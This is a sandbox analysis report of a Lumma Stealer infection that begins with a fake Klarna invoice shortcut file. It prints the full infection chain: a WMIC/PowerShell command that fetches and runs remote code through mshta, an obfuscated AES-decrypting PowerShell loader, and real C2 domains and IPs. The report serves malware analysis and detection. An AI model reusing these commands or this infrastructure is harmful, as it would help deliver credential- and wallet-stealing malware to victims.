Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KlarnaInvoice229837.pdf.lnk

Overview

General Information

Sample name:KlarnaInvoice229837.pdf.lnk
Analysis ID:1575736
MD5:da28a682053a47872919a14d25e98598
SHA1:ab0f8eb3dd79555ed426f70fee752fe037e74fa5
SHA256:f830850a900edc87a76adfafb59fe18b33426bad84478cb1c6a6392f582b4c78
Tags:CHEgeolnkLummaStealeruser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to create processes via WMI
Creates processes via WMI
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • WMIC.exe (PID: 4348 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5544 cmdline: powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mshta.exe (PID: 6960 cmdline: "C:\Windows\System32\mshta.exe" https://naubeautylus.ch/Headerfrontend MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 1344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD5827E2193AF83B13A9484213EC696E93EAD4E5C86D3B340D0383DF19D9C6B9177B473A715691E727DD59FAD481BB49CFEA164A8C8A2491D767B90BD1F1A11FC199A39158AB0C73865F35115CBBE29DBEC488B90B0DC061AD5039FE414583BD0E8BD4E7B7672D629DE366DBFAED2D2883ABA50A9A3E095A1B26777F10398DF92E050D286E806395A5648C371F95E62603829AB9CCCACC87BA02D01A00AFE9838ECF66997E0A551A83FFD859BBA6E2E568E9EDF081936A8569161CB274B3B9FC21427BBFF2D5D3CF500872D4A683668F2BA8C3038B93718EE8317DBCCA6305CD634DD1B2335210DC703C66A2F0B81A0128C9E257E324E61A18DA3ABFD1FF42A8E1E1E8F1E7A7E412839AAE35575C1AB8B6072F3F101F284610A7A9532CE85C597BD62A5F4DEB11490AF74CF21ECB396C3208FB1E2589B5CE209FFE1017BD9C5FAECDA99ACB77A243D50657551D5D47F459F8E119B10653DCCB3289C76C9277136D22F53A69199D62D4FFD4041CF72E1A171243BD2074D940A15228E8513CE7A56D65D8EC952DA1892A1C0DD32267424040F32729D596424618D14BC5778CA69A50F5378CE90DD67BF9999C530599FA84EEDF1437CAD4599F3B7A5E7C715AF39F96B02950C66C2C6BA86E0CA9B675D12FDB087692B5AAB0023D114DDA9F406E075D82EBF2F19297D6F614E17214DB113946B455BD69B36718F5E9FDD59B17F24ADE82623F8E02D3779A8A68B9AD01E429B87EFA6E75E2447F0911F56F9765C959A678DCB2037D736BE2BEBFAA18D5CD0E5D31518F484AA55F2B977C501125F80803041206588BADA41525EE9B8028EA58781C70961A6BB0694F09DA35A160ED1AE70FB8C2E6354A6F03BFC8C02611C83AD60917171564EB342465A947A75C12850F40B68C68DF9C5D83328A98798B17DBEA519B0CE39850F7D8E390584FED55BE5059CA71D2719A0D9B3575AD4DA7287E4D5C5F7EFBA6CC3A3F7F4BCD13AC1249B159691B69F1D64638B49A4BB7A28DA57B77892D7E8F00A1D56280ACF19657E31A66DFC23FBA50CFDA53B25280E96E1FBF839A922391F2D69B1839C422568935D9A35EB45649512E2FDFF02BB416951E3F123183CA94CCFCCB683F885C28A6612BE81855A88151A9D947C889DF4B8536261DCAAD58C911647AB6B0D09AAE2E7F0815EF1890124C736FB150D2551F0419A04AA7E0C0AA8A883CD43E6C794BCACCAFBDC6CEA95B925F072D8EC8D52F266541A22E74F87228F055F2EC79DE196F94BD5C59D029B1320B41AAF44D624365A3C1EC5F6B716D4A575948474E4552594C66474E';function cZF ($PgTDvwwB){return -split ($PgTDvwwB -replace '..', '0x$& ')};$kvsOmI = cZF($ddg.SubString(0, 2080));$qlR = [System.Security.Cryptography.Aes]::Create();$qlR.Key = cZF($ddg.SubString(2080));$qlR.IV = New-Object byte[] 16;$GluWYuA = $qlR.CreateDecryptor();$ZwjPYT = [System.String]::new($GluWYuA.TransformFinalBlock($kvsOmI, 0,$kvsOmI.Length)); sal fd $ZwjPYT.Substring(3,3); fd $ZwjPYT.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 7200 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 7384 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 7548 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1636,i,12666906857534162029,3532720811796512563,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • IMAKBWPY.exe (PID: 5332 cmdline: "C:\Users\user\AppData\Roaming\IMAKBWPY.exe" MD5: EAE347B707607585B09FF0515E84087C)
            • IMAKBWPY.exe (PID: 4588 cmdline: "C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe" -burn.clean.room="C:\Users\user\AppData\Roaming\IMAKBWPY.exe" -burn.filehandle.attached=520 -burn.filehandle.self=516 MD5: E9D35A53128839CFBB1A329A23BB430B)
              • pyexec.exe (PID: 8184 cmdline: "C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe" MD5: B6F6C3C38568EE26F1AC70411A822405)
                • pyexec.exe (PID: 7444 cmdline: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exe MD5: B6F6C3C38568EE26F1AC70411A822405)
                  • cmd.exe (PID: 340 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • explorer.exe (PID: 6160 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • svchost.exe (PID: 5064 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["deafeninggeh.biz", "diffuculttan.xyz", "effecterectz.xyz", "awake-weaves.cyou", "debonairnukk.xyz", "immureprech.biz", "passworoggre.click", "sordid-snaked.cyou", "wrathful-jammy.cyou"], "Build id": "AB15g1--NEWBuild"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\ryuvnpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
        decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          22.2.explorer.exe.310000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://naubeautylus.ch/Headerfrontend, CommandLine: "C:\Windows\System32\mshta.exe" https://naubeautylus.ch/Headerfrontend, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5544, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://naubeautylus.ch/Headerfrontend, ProcessId: 6960, ProcessName: mshta.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD5827E2193AF83B13A9484213EC696E93EAD4E5C86D3B340D0383DF19D9C6B9177B473A715691E727DD59FAD481BB49CFEA164A8C8A2491D767B90BD1F1A11FC199A39158AB0C73865F35115CBBE29DBEC488B90B0DC061AD5039FE414583BD0E8BD4E7B7672D629DE366DBFAED2D2883ABA50A9A3E095A1B26777F10398DF92E050D286E806395A5648C371F95E62603829AB9CCCACC87BA02D01A00AFE9838ECF66997E0A551A83FFD859BBA6E2E568E9EDF081936A8569161CB274B3B9FC21427BBFF2D5D3CF500872D4A683668F2BA8C3038B93718EE8317DBCCA6305CD634DD1B2335210DC703C66A2F0B81A0128C9E257E324E61A18DA3ABFD1FF42A8E1E1E8F1E7A7E412839AAE35575C1AB8B6072F3F101F284610A7A9532CE85C597BD62A5F4DEB11490AF74CF21ECB396C3208FB1E2589B5CE209FFE1017BD9C5FAECDA99ACB77A243D50657551D5D47F459F8E119B10653DCCB3289C76C9277136D22F53A69199D62D4FFD4041CF72E1A171243BD2074D940A15228E8513CE7A56D65D8EC952DA1892A1C0DD32267424040F32729D596424618D14BC5778CA69A50F5378CE90DD67BF9999C530599FA84EEDF1437CAD4599F3B7A5E7C715AF39F96B02950C66C2C6BA86E0CA9B675D12FDB087692B5AAB0023D114DDA9F406E075D82EBF2F19297D6F614E17214DB113946B455BD69B36718F5E9FDD59B17F24ADE82623F8E02D3779A8A68B9AD01E429B87EFA6E75E2447F0911F56F9765C959A678DCB2037D736BE2BEBFAA18D5CD0E5D31518F484AA55F2B977C501125F80803041206588BADA41525EE9B8028EA58781C70961A6BB0694F09DA35A160ED1AE70FB8C2E6354A6F03BFC8C02611C83AD60917171564EB342465A947A75C12850F40B68C68DF9C5D83328A98798B17DBEA519B0CE39850F7D8E390584FED55BE5059CA71D2719A0D9B3575AD4DA7287E4D5C5F7EFBA6CC3A3F7F4BCD13AC1249B159691B69F1D64638B49A4BB7A28DA57B77892D7E8F00A1D56280ACF19657E31A66DFC23FBA50CFDA53B25280E96E1FBF839A922391F2D69B1839C422568935D9A35EB45649512E2FDFF02BB416951E3F123183CA94CCFCCB683F885C28A6612BE81855A88151A9D947C889DF4B8536261DCAAD58C911647AB6B0D09AAE2E7F0815EF1890124C736FB150D2551F0419A04AA7E0C0AA8A883CD43E6C794BCACCAFBDC6CEA95B925F072D8EC8D52F266541A22E74F87228F055F2EC79DE196F94BD5C59D029B1320B41AAF44D624365A3C1EC5F6B716D4A575948474E4552594C66474E';function cZF ($PgTDvwwB){return -split ($PgTDvwwB -replace '..', '0x$& ')};$kvsOmI = cZF($ddg.SubString(0, 2080));$qlR = [System.Security.Cryptography.Aes]::Create();$qlR.Key = cZF($ddg.SubString(2080));$qlR.IV = New-Object byte[] 16;$GluWYuA = $qlR.CreateDecryptor();$ZwjPYT = [System.String]::new($GluWYuA.TransformFinalBlock($kvsOmI, 0,$kvsOmI.Length)); sal fd $ZwjPYT.Substring(3,3); fd $ZwjPYT.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD582
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend", ProcessId: 4348, ProcessName: WMIC.exe
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD5827E2193AF83B13A9484213EC696E93EAD4E5C86D3B340D0383DF19D9C6B9177B473A715691E727DD59FAD481BB49CFEA164A8C8A2491D767B90BD1F1A11FC199A39158AB0C73865F35115CBBE29DBEC488B90B0DC061AD5039FE414583BD0E8BD4E7B7672D629DE366DBFAED2D2883ABA50A9A3E095A1B26777F10398DF92E050D286E806395A5648C371F95E62603829AB9CCCACC87BA02D01A00AFE9838ECF66997E0A551A83FFD859BBA6E2E568E9EDF081936A8569161CB274B3B9FC21427BBFF2D5D3CF500872D4A683668F2BA8C3038B93718EE8317DBCCA6305CD634DD1B2335210DC703C66A2F0B81A0128C9E257E324E61A18DA3ABFD1FF42A8E1E1E8F1E7A7E412839AAE35575C1AB8B6072F3F101F284610A7A9532CE85C597BD62A5F4DEB11490AF74CF21ECB396C3208FB1E2589B5CE209FFE1017BD9C5FAECDA99ACB77A243D50657551D5D47F459F8E119B10653DCCB3289C76C9277136D22F53A69199D62D4FFD4041CF72E1A171243BD2074D940A15228E8513CE7A56D65D8EC952DA1892A1C0DD32267424040F32729D596424618D14BC5778CA69A50F5378CE90DD67BF9999C530599FA84EEDF1437CAD4599F3B7A5E7C715AF39F96B02950C66C2C6BA86E0CA9B675D12FDB087692B5AAB0023D114DDA9F406E075D82EBF2F19297D6F614E17214DB113946B455BD69B36718F5E9FDD59B17F24ADE82623F8E02D3779A8A68B9AD01E429B87EFA6E75E2447F0911F56F9765C959A678DCB2037D736BE2BEBFAA18D5CD0E5D31518F484AA55F2B977C501125F80803041206588BADA41525EE9B8028EA58781C70961A6BB0694F09DA35A160ED1AE70FB8C2E6354A6F03BFC8C02611C83AD60917171564EB342465A947A75C12850F40B68C68DF9C5D83328A98798B17DBEA519B0CE39850F7D8E390584FED55BE5059CA71D2719A0D9B3575AD4DA7287E4D5C5F7EFBA6CC3A3F7F4BCD13AC1249B159691B69F1D64638B49A4BB7A28DA57B77892D7E8F00A1D56280ACF19657E31A66DFC23FBA50CFDA53B25280E96E1FBF839A922391F2D69B1839C422568935D9A35EB45649512E2FDFF02BB416951E3F123183CA94CCFCCB683F885C28A6612BE81855A88151A9D947C889DF4B8536261DCAAD58C911647AB6B0D09AAE2E7F0815EF1890124C736FB150D2551F0419A04AA7E0C0AA8A883CD43E6C794BCACCAFBDC6CEA95B925F072D8EC8D52F266541A22E74F87228F055F2EC79DE196F94BD5C59D029B1320B41AAF44D624365A3C1EC5F6B716D4A575948474E4552594C66474E';function cZF ($PgTDvwwB){return -split ($PgTDvwwB -replace '..', '0x$& ')};$kvsOmI = cZF($ddg.SubString(0, 2080));$qlR = [System.Security.Cryptography.Aes]::Create();$qlR.Key = cZF($ddg.SubString(2080));$qlR.IV = New-Object byte[] 16;$GluWYuA = $qlR.CreateDecryptor();$ZwjPYT = [System.String]::new($GluWYuA.TransformFinalBlock($kvsOmI, 0,$kvsOmI.Length)); sal fd $ZwjPYT.Substring(3,3); fd $ZwjPYT.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD582
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1344, TargetFilename: C:\Users\user\AppData\Roaming\IMAKBWPY.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend, CommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 4348, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://naubeautylus.ch/Headerfrontend, ProcessId: 5544, ProcessName: powershell.exe
            Source: Process startedAuthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 340, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 6160, ProcessName: explorer.exe
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5064, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T09:15:26.646413+010020283713Unknown Traffic192.168.2.449815104.21.59.81443TCP
            2024-12-16T09:15:29.050365+010020283713Unknown Traffic192.168.2.449820104.21.59.81443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T09:15:27.711404+010020546531A Network Trojan was detected192.168.2.449815104.21.59.81443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T09:15:27.711404+010020498361A Network Trojan was detected192.168.2.449815104.21.59.81443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-16T09:14:19.746722+010028033053Unknown Traffic192.168.2.44973662.182.21.105443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 22.2.explorer.exe.310000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["deafeninggeh.biz", "diffuculttan.xyz", "effecterectz.xyz", "awake-weaves.cyou", "debonairnukk.xyz", "immureprech.biz", "passworoggre.click", "sordid-snaked.cyou", "wrathful-jammy.cyou"], "Build id": "AB15g1--NEWBuild"}
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Headerfrontend[1]ReversingLabs: Detection: 23%
            Source: KlarnaInvoice229837.pdf.lnkReversingLabs: Detection: 13%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\ryuvnpJoe Sandbox ML: detected
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: effecterectz.xyz
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: immureprech.biz
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: passworoggre.click
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: AB15g1--NEWBuild
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009BA0BB DecryptFileW,16_2_009BA0BB
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009DFA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,16_2_009DFA62
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009B9E9E DecryptFileW,DecryptFileW,16_2_009B9E9E
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0024A0BB DecryptFileW,17_2_0024A0BB
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_0026FA62 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,17_2_0026FA62
            Source: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exeCode function: 17_2_00249E9E DecryptFileW,DecryptFileW,17_2_00249E9E
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeFile opened: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\msvcr90.dll
            Source: unknownHTTPS traffic detected: 62.182.21.105:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 62.182.21.105:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.59.81:443 -> 192.168.2.4:49815 version: TLS 1.2
